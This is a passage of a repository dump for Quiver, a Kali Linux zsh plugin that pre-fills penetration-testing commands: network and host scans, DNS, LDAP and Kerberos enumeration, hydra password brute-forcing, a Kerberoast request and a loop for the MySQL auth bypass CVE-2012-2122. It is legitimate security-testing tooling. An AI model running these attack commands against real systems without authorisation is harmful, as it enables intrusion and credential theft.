[ { "path": ".gitattributes", "content": "# Auto detect text files and perform LF normalization\n* text=auto\n" }, { "path": ".gitignore", "content": "\n# ignore qq-custom.zsh module\nmodules/qq-custom.zsh\nlog.txt\nremote_checked.txt\nremote_ver.txt\n" }, { "path": ".vscode/settings.json", "content": "{\n \"editor.detectIndentation\": false\n}" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2020 Steve McIlwain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# Quiver : A Meta-Tool for Kali Linux\n\nQuiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again. Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation. \n\nQuiver doesn't cover all tools, it's my own curated collection which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I jsut try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list.\n\n# Release 1.0 \n\nAfter months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists. If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`. \n\n* [RELEASES.md](RELEASES.md)\n\n# Features\n\n* Prefills the commands within a terminal\n* Well-organized commands with tab auto-completion\n* Installs as a ZSH / Oh-My-ZSH shell plugin\n* Customizable settings, Global variables\n* Recon phase commands for OSINT\n* Enumeration of common services\n* Web enumeration, brute-forcing and hacking\n* Exploit compilation helpers\n* Reverse shell handlers\n* Content serving commands\n* Built-in logbook for on-the-fly notes, saving commands\n* Render markdown notes to the command line\n* Kali Linux system management\n* Update notification and install\n* Installers for dependencies\n\n# Installation\n\nQuiver requires the following:\n\n* ZSH (apt-get install zsh)\n* oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/)\n* Kali Linux (https://kali.org)\n\nClone the repo to your OMZ custom plugins folder.\n\n```bash\n\ngit clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver\n\n```\nEdit ~/.zshrc to load the plugin.\n\n```\n\nplugins=(git quiver)\n\n```\n\nSource .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages.\n\n```\n\nsource ~/.zshrc\n\n```\n\n## Getting Started\n\nQuiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`.\nTo see an overview of all namespaces simply use `qq-help`. Each namespace also has it's own help command, such as `qq-enum-web-help` that provides a listing of available commands. All commands support tab completion and search. \n\n## Installing Dependencies\n\nEvery namespace was a qq--install command that will install all of the tools relavent to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces.\n\n## Workflow\n\nQuiver is meant to provide a composable, on-the-fly workflow. It replaces the common painful raw workflow of reading your notes, finding a command, copy, paste, replace the values with target values, copy, paste, run. Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques and be cumbersom to modify. Instead, Quiver gives you a happy medium, you can run commands quickly and easy with well-organized output, composing your workflow as you go depending on the targets and context. \n\n## Example Workflow\n\nHere is an example workflow for bug bounty hunting:\n\n### Prep\n\n```bash\n\n# if you have markdown notes, configure the path \nqq-vars-global-set-notes\n\n# set some session variables for the bounty target \nqq-vars-set-project \nqq-vars-set-domain \n\n# generate scope files from the bounty url\nqq-project-rescope\n\n# save vars for other terminal sessions, qq-vars-load\nqq-vars-save\n\n```\n\n### Passive Recon\n\n```bash\n\n# search for target files\nqq-recon-org-files\n\n# search downloaded files for urls\nqq-recon-org-files-urls\n\n# mine github repos for secrets\nqq-recon-github-gitrob\n\n# check dns records\nqq-enum-dns-dnsrecon\n\n# look for ASNs and networks\nqq-recon-networks-amass-asns\nqq-recon-networks-bgpview-ipv4\n\n# get subdomains\nqq-recon-subs-subfinder\n\n# resolve and parse subdomains\nqq-recon-subs-resolve-massdns\nqq-recon-subs-resolve-parse\n\n```\n\n### Active Web Enumeration\n\n```bash\n\n# Download out robots.txt\nqq-enum-web-dirs-robots\n\n# ID a WAF if present\nqq-enum-web-waf\n\n# Parse SSL certs\nqq-enum-web-ssl-certs\n\n# Spider the site\nqq-enum-web-gospider\n\n# Brute force URIs\nqq-enum-web-dirs-ffuf\n\n# Read your notes\nqq-notes\n\n```\n" }, { "path": "RELEASES.md", "content": "# Releases\n\n## 1.0 6/4/2020\n\nComplete refactor and reorganization, including:\n\n* Added qq--help commands to all modules\n* Added qq--install commands to all modules\n* More variables that auto-populate in qq-vars\n* Persistent variables in qq-vars-global for customization of settings\n* New qq-shell namespaces\n* Better organization in qq-recon namespaces\n* qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom\n* qq-notes updated with more features\n* New qq-kali namespace added with system commands\n* qq-install refactored to include custom installers\n* New qq-exploit namespace added \n* New qq-enum-* namespaces added for more services\n\n## 0.16 3/28/2020\n\n* Fixed qq-bounty.zsh\n* Fixed qq-project.zsh: logfile and output settings\n* Fixed qq-vars.zsh recursively creating directories in __OUTPUT\n\n## 0.15 3/24/2020\n\n* Added qq-enum-mssql.zsh\n* Added qq-enum-mysql.zsh\n* Added qq-enum-oracle.zsh\n* Added qq-enum-nfs.zsh\n* Added qq-enum-pop3.zsh\n* qq-srv.zsh: added 3 new listeners for tar, nc>file and b64\n\n## 0.14 3/24/2020\n\n* quiver.plugin.zsh: added zstyle tab autocompletion\n** use qq- to search for commands across any namespace\n* qq-install.zsh\n** added jsbeautifier \n* qq-vars.zsh: set-output will now create the root directory if missing\n\n## 0.12 3/22/2020\n\n* qq-vars.zsh: Added global variables for the most common arguments, load and save\n* qq-srv.zsh: added updog\n* qq-project.zsh added folder scaffolding for projects / engagements\n* qq-log.zsh integration with qq-vars\n* Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh\n* Lot of minor changes\n\n## 0.11 - 3/9/2020\n\n* You can now specify a path to your markdown notes by setting $__NOTES\n* qq-notes.zsh: notes search and display \n* qq-exploit.zsh: compilation helpers\n* qq-enum-web-php: php specific enumeration such as lfi, rfi and scans\n* minor fixes \n\n## 0.10 - 3/4/2020\n\n* Added module: qq-enum-kerb.zsh for kerboros enumeration functions\n* Added module: qq-enum-rdp.zsh for RDP enumeration functions\n* Added module: qq-enum-smb.zsh for SMB enumeration functions\n* Aded qq-debug to print ~/.quiver/log.txt \n* Fixed glow commands to not use pager, leaving the output available in the console window\n\n## 0.9 - 3/4/2020\n\n* Minor fixes and improvements\n* Added scripts/recon.zsh\n* Added qq-bounty for bug bounty helpers\n* Added rescope to install script and qq-bounty\n* Added qq-enum-ldap\n* Removed noisy banner and log loading to ./quiver/log.txt\n* Added qq-enum-ftp-notes-vsftp\n* Added qq-custom.zsh module for your custom aliases and functions (ignored)\n* Added .gitignore (for qq-custom.zsh)\n\n## 0.8 - 2/25/2020\n\n* qq-pivot: added ssh tunneling commands\n* qq-log: added short aliases\n* qq-enum-web: moved fuzzing to qq-enum-web-fuzz\n* qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands\n* qq-enum-web-xss: added XSS helpers\n* qq-enum-web-ssl: added SSL commands and notes\n* qq-aliases: better organization, added aliases for custom functions\n\n\n" }, { "path": "VERSION", "content": "1.0.0" }, { "path": "modules/qq-encoding.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-encoding\n#############################################################\n\nqq-encoding-help() {\n cat << \"DOC\"\n\nqq-encoding\n----------\nThe encoding namespace provides commands for encoding and decoding values.\n\nCommands\n--------\nqq-encoding-file-to-b64: encodes plain text file to base64, optional $1 as file\nqq-encoding-file-from-b64: decodes base64 file to plain text, optional $1 as file\n\nDOC\n}\n\nqq-encoding-file-to-b64() {\n if [ \"$#\" -eq \"1\" ]\n then\n print -z \"cat $1 | base64 > $1.b64\"\n else \n local f && __askpath f FILE $(pwd)\n print -z \"cat ${f} | base64 > ${f}.b64\"\n fi\n}\n\nqq-encoding-file-from-b64() {\n if [ \"$#\" -eq \"1\" ]\n then\n print -z \"cat $1 | base64 -d > $1.txt\"\n else \n local f && __askpath f FILE $(pwd)\n print -z \"cat ${f} | base64 -d > ${f}.txt\"\n fi\n}" }, { "path": "modules/qq-enum-dhcp.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-dhcp\n#############################################################\n\nqq-enum-dhcp-help() {\n cat << \"DOC\"\n\nqq-enum-dhcp\n-------------\nThe qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers.\n\nCommands\n--------\nqq-enum-dhcp-install: installs dependencies\nqq-enum-dhcp-nmap-sweep: scan a network for services\nqq-enum-dhcp-tcpdump: capture traffic to and from a host\nqq-enum-dhcp-discover-nmap: broadcast DHCP discover packets\n\nDOC\n}\n\nqq-enum-dhcp-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap \n}\n\nqq-enum-dhcp-sweep-nmap() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep\"\n}\n\nqq-enum-dhcp-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and udp port 67 and port 68 -w $(__hostpath)/dhcp.pcap\"\n}\n\nqq-enum-dhcp-discover-nmap() {\n print -z \"sudo nmap -v --script broadcast-dhcp-discover\"\n}\n" }, { "path": "modules/qq-enum-dns.zsh", "content": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-dns\n#############################################################\n\nqq-enum-dns-help() {\n cat << \"DOC\"\n\nqq-enum-dns\n-------------\nThe qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers.\nCommands are executed against specific name servers (__RHOST) rather than public resolvers.\n\nCommands\n--------\nqq-enum-dns-install: installs dependencies\nqq-enum-dns-nmap-sweep: scan a network for services\nqq-enum-dns-tcpdump: capture traffic to and from a host\nqq-enum-dns-host-txfr: attempt a zone transfer\nqq-enum-dns-host-all: list all types\nqq-enum-dns-host-txt: list txt records\nqq-enum-dns-host-mx: list mx records\nqq-enum-dns-host-ns: list ns records\nqq-enum-dns-host-srv: list srv records\nqq-enum-dns-nmap-ad: discover Active Directory related records\nqq-enum-dns-dnsrecon: discover dns records, servers and attempt zone txfrs\nqq-enum-dns-dnsrecon-reverse: do reverse lookups on an IP network\n\nDOC\n}\n\nqq-enum-dns-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap dnsutils dnsrecon \n}\n\nqq-enum-dns-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep\"\n}\n\nqq-enum-dns-tcpdump() {\n __check-project \n __check-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 53 -w $(__hostpath)/dns.pcap\"\n}\n\nqq-enum-dns-host-txfr() {\n qq-vars-set-rhost\n qq-vars-set-domain\n print -z \"host -l ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-all() {\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"host -a ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-txt() {\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"host -t txt ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-mx() {\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"host -t mx ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-ns() {\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"host -t ns ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-srv() {\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"host -t srv ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-nmap-ad() {\n __check-project\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -o $(__dompath)/nmap-AD.txt\"\n}\n\nqq-enum-dns-dnsrecon() {\n __check-project\n qq-vars-set-domain\n qq-vars-set-rhost\n print -z \"dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv\"\n}\n\nqq-enum-dns-dnsrecon-reverse() {\n __check-project\n qq-vars-set-rhost\n mkdir -p ${__PROJECT}/domains\n print -z \"dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv\"\n}\n" }, { "path": "modules/qq-enum-ftp.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ftp\n#############################################################\n\nqq-enum-ftp-help() {\n cat << \"DOC\"\n\nqq-enum-ftp\n-------------\nThe qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers.\n\nCommands\n--------\nqq-enum-ftp-install: installs dependencies\nqq-enum-ftp-nmap-sweep: scan a network for services\nqq-enum-ftp-tcpdump: capture traffic to and from a host\nqq-enum-ftp-hydra: brute force passwords for a user account\nqq-enum-ftp-lftp-grep: search (grep) the target system\nqq-enum-ftp-wget-mirror: mirror the FTP server locally\n\nDOC\n}\n\nqq-enum-ftp-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap hydra ftp lftp wget \n}\n\nqq-enum-ftp-sweep-nmap() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep\"\n}\n\nqq-enum-ftp-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap\"\n}\n\nqq-enum-ftp-hydra() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} FTP\"\n}\n\nqq-enum-ftp-lftp-grep() {\n qq-vars-set-rhost\n local q && __askvar q QUERY\n print -z \"lftp ${__RHOST}:/ > find | grep -i \\\"${QUERY}\\\" \"\n}\n\nqq-enum-ftp-wget-mirror() {\n __warn \"The destination site will be mirrored in the current directory\"\n qq-vars-set-rhost\n local u && __prefill u USER \"anonymous\"\n local p && __prefill p PASSWORD \"anonymous@example.com\"\n print -z \"wget --mirror ftp://${u}:${p}@${__RHOST}\"\n}\n" }, { "path": "modules/qq-enum-host.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-host\n#############################################################\n\nqq-enum-host-help() {\n cat << \"DOC\"\n\nqq-enum-host\n-------------\nThe qq-enum-host namespace contains commands for scanning and enumerating\nan individual host.\n\nCommands\n--------\nqq-enum-host-install: installs dependencies\nqq-enum-host-tcpdump: capture traffic to and from a host\nqq-enum-host-nmap-top: syn scan of the top 1000 ports\nqq-enum-host-nmap-top-discovery: syn scan of the top 1000 ports with versioning and scripts\nqq-enum-host-nmap-all: syn scan all ports \nqq-enum-host-nmap-all-discovery: syn scan all ports with versioning and scripts\nqq-enum-host-nmap-udp: udp scan top 100 ports\nqq-enum-host-masscan-all-tcp: scan all tcp ports\nqq-enum-host-masscan-all-udp: scan all udp ports\nqq-enum-host-nmap-lse-grep: search nmap lse scripts\n\nDOC\n}\n\nqq-enum-host-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap masscan curl\n}\n\nqq-enum-host-tcpdump() {\n __check-project\n __check-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap\"\n}\n\nqq-enum-host-nmap-top(){\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top\"\n}\n\nqq-enum-host-nmap-top-discovery(){\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery\"\n}\n\nqq-enum-host-nmap-all() {\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all\"\n}\n\nqq-enum-host-nmap-all-discovery() {\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery\"\n}\n\nqq-enum-host-nmap-udp() {\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp\"\n}\n\nqq-enum-host-masscan-all-tcp() {\n __check-iface\n __check-project\n qq-vars-set-rhost\n print -z \"masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt\"\n}\n\nqq-enum-host-masscan-all-udp() {\n __check-iface\n __check-project\n qq-vars-set-rhost\n print -z \"masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt\"\n}\n\nqq-enum-host-nmap-lse-grep() {\n local q && __askvar q QUERY\n print -z \"ls /usr/share/nmap/scripts/* | grep -ie \\\"${q}\\\" \"\n}\n\nqq-enum-host-ip() {\n __check-project\n qq-vars-set-rhost\n print -z \"curl -s \\\"https://iplist.cc/api/${__RHOST}\\\" | tee $(__hostpath/ip.json) \"\n}" }, { "path": "modules/qq-enum-kerb.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-kerb\n#############################################################\n\nqq-enum-kerb-help() {\n cat << \"DOC\"\n\nqq-enum-kerb\n------------\nThe qq-enum-kerb namespace contains commands for scanning and \nenumerating kerberos records and servers.\n\nCommands\n--------\nqq-enum-kerb-install: installs dependencies\nqq-enum-kerb-nmap-sweep: scan a network for services\nqq-enum-kerb-tcpdump: capture traffic to and from a host\nqq-enum-kerb-users: enumerate domain users\nqq-enum-kerb-kerberoast: get SPN for a service account\n\nDOC\n}\n\nqq-enum-kerb-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap impacket-scripts \n}\n\nqq-enum-kerb-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep\"\n}\n\nqq-enum-kerb-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap\"\n}\n\nqq-enum-kerb-users() {\n qq-vars-set-rhost\n local realm && __askvar realm REALM\n print -z \"nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}\"\n}\n\nqq-enum-kerb-kerberoast() {\n __ask \"Enter target AD domain (must also be set in your hosts file)\"\n qq-vars-set-domain\n __ask \"Enter service user account\"\n __check-user\n __ask \"Enter the IP address of the target domain controller\"\n qq-vars-set-rhost\n print -z \"impacket-GetUserSPNs -request ${__DOMAIN}s/${__USER} -dc-ip ${__RHOST} \"\n}\n" }, { "path": "modules/qq-enum-ldap.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ldap\n#############################################################\n\nqq-enum-ldap-help() {\n cat << \"DOC\"\n\nqq-enum-ldap\n------------\nThe qq-enum-ldap namespace contains commands for scanning and \nenumerating Active Directory DC, GC and LDAP servers.\n\nCommands\n--------\nqq-enum-ldap-install: installs dependencies\nqq-enum-ldap-nmap-sweep: scan a network for services\nqq-enum-ldap-tcpdump: capture traffic to and from a host\nqq-enum-ldap-ctx: query ldap naming contexts\nqq-enum-ldap-search-anon: connect with anonymous bind and query ldap\nqq-enum-ldap-search-auth: connect with authenticated bind and query ldap\nqq-enum-ldap-whoami: send ldap whoami request\nqq-enum-ldap-hydra: brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-ldap-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap ldap-utils hydra\n}\n\nqq-enum-ldap-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -sU -p389,636,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep\"\n}\n\nqq-enum-ldap-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 389 and port 636 and port 3269 -w $(__hostpath)/ldap.pcap\"\n}\n\nqq-enum-ldap-ctx() {\n __ask \"Enter the address of the target DC, GC or LDAP server\"\n qq-vars-set-rhost\n print -z \"ldapsearch -x -h ${__RHOST} -s base namingcontexts\"\n}\n\nqq-enum-ldap-search-anon() {\n __ask \"Enter the address of the target DC, GC or LDAP server\"\n qq-vars-set-rhost\n __ask \"Enter a distinguished name (DN), such as: DC=example,DC=com\"\n local dn && __askvar dn DN\n print -z \"ldapsearch -x -h ${__RHOST} -s sub -b \\\"${dn}\\\" \"\n}\n\nqq-enum-ldap-search-auth() {\n __ask \"Enter the address of the target DC, GC or LDAP server\"\n qq-vars-set-rhost\n __ask \"Enter a distinguished name (DN), such as: DC=example,DC=com\"\n local dn && __askvar dn DN\n __ask \"Enter a user account with bind and read permissions to the directory\"\n __check-user\n print -z \"ldapsearch -x -h ${__RHOST} -D '${dn}' \\\"(objectClass=*)\\\" -w \\\"${__USER}\\\" \"\n}\n\nqq-enum-ldap-whoami() {\n __ask \"Enter the address of the target DC, GC or LDAP server\"\n qq-vars-set-rhost\n print -z \"ldapwhoami -h ${__RHOST} -w \\\"non-existing-user\\\" \"\n}\n\nqq-enum-ldap-hydra() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} LDAP\"\n}\n" }, { "path": "modules/qq-enum-mssql.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mssql\n#############################################################\n\nqq-enum-mssql-help() {\n cat << \"DOC\"\n\nqq-enum-mssql\n-------------\nThe qq-enum-mssql namespace contains commands for scanning and \nenumerating MS SQL Server services and databases.\n\nCommands\n--------\nqq-enum-mssql-install: installs dependencies\nqq-enum-mssql-nmap-sweep: scan a network for services\nqq-enum-mssql-tcpdump: capture traffic to and from a host\nqq-enum-mssql-sqsh: make an interactive database connection\nqq-enum-mssql-impacket-client: connect using impacket as a sql client\nqq-enum-mssql-hydra: brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-mssql-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap sqsh impacket-scripts hydra\n}\n\nqq-enum-mssql-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep\"\n}\n\nqq-enum-mssql-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap\"\n}\n\nqq-enum-mssql-sqsh() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"sqsh -S ${__RHOST} -U ${__USER}\"\n}\n\nqq-enum-mssql-impacket-client() {\n qq-vars-set-rhost\n __check-user\n local db && __askvar db DATABASE\n print -z \"python3 ${__IMPACKET}/mssqlclient.py ${__USER}@${__RHOST} -db ${db} -windows-auth \"\n}\n\nqq-enum-mssql-hydra() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} MS-SQL\"\n}" }, { "path": "modules/qq-enum-mysql.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mmysql\n#############################################################\n\nqq-enum-mysql-help() {\n cat << \"DOC\"\n\nqq-enum-mysql\n-------------\nThe qq-enum-mysql namespace contains commands for scanning and \nenumerating mysql server services and databases.\n\nCommands\n--------\nqq-enum-mysql-install: installs dependencies\nqq-enum-mysql-nmap-sweep: scan a network for services\nqq-enum-mysql-tcpdump: capture traffic to and from a host\nqq-enum-mysql-client: connect using the mysql client\nqq-enum-mysql-auth-bypass: attempt auth bypass\nqq-enum-mysql-hydra: brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-mysql-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap mysql\n}\n\nqq-enum-mysql-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep\"\n}\n\nqq-enum-mysql-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap\"\n}\n\nqq-enum-mysql-client(){\n qq-vars-set-rhost\n __check-user\n print -z \"mysql -u ${__USER} -p -h ${__RHOST}\"\n}\n\nqq-enum-mysql-auth-bypass() {\n qq-vars-set-rhost\n __info \"CVE-2012-2122\"\n print -z \"for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done\"\n}\n\nqq-enum-mysql-hydra() {\n __check-project\n qq-vars-set-rhost\n __check-user\n local db && __prefill db DATABASE mysql\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} MYSQL ${db}\"\n}\n" }, { "path": "modules/qq-enum-network.zsh", "content": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-network\n#############################################################\n\nqq-enum-network-help() {\n cat << \"DOC\"\n\nqq-enum-network\n-------------\nThe qq-enum-network namespace contains commands for scanning and enumerating\na network.\n\nCommands\n--------\nqq-enum-network-install: installs dependencies\nqq-enum-network-tcpdump: capture traffic to and from a network\nqq-enum-network-tcpdump-bcasts: capture ethernet broadcasts and multi-cast traffic\nqq-enum-network-nmap-ping-sweep: sweep a network with ping requests\nqq-enum-network-nmap-syn-sweep: sweep a network with TCP syn requests, top 1000 ports\nqq-enum-network-nmap-udp-sweep: sweep a network with UDP requests, top 100 ports\nqq-enum-network-nmap-all-sweep: sweep a network with TCP syn requests, all ports\nqq-enum-network-nmap-discovery: sweep a network with TCP syn requests and scripts, top 100 ports\nqq-enum-network-masscan-top: sweep a network with TCP requests, uses $__TCP_PORTS global var\nqq-enum-network-masscan-windows: sweep a network for common Windows ports\nqq-enum-network-masscan-linux: sweep a network for common Linux ports\nqq-enum-network-masscan-web: sweep a network for common web server ports\n\nDOC\n}\n\nqq-enum-network-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap masscan\n}\n\n\nqq-enum-network-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-network\n print -z \"sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap\"\n}\n\nqq-enum-network-tcpdump-bcasts() {\n __check-project\n qq-vars-set-iface\n print -z \"sudo tcpdump -i ${__IFACE} ether broadcast and ether multicast -w $__PROJECT/networks/bcasts.pcap\"\n}\n\nqq-enum-network-nmap-ping-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep\"\n}\n\nqq-enum-network-nmap-syn-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -vvv -n -Pn -sS --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep\"\n}\n\nqq-enum-network-nmap-udp-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep\"\n}\n\nqq-enum-network-nmap-all-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep\"\n}\n\nqq-enum-network-nmap-discovery() {\n __check-project\n qq-vars-set-network\n print -z \"nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA 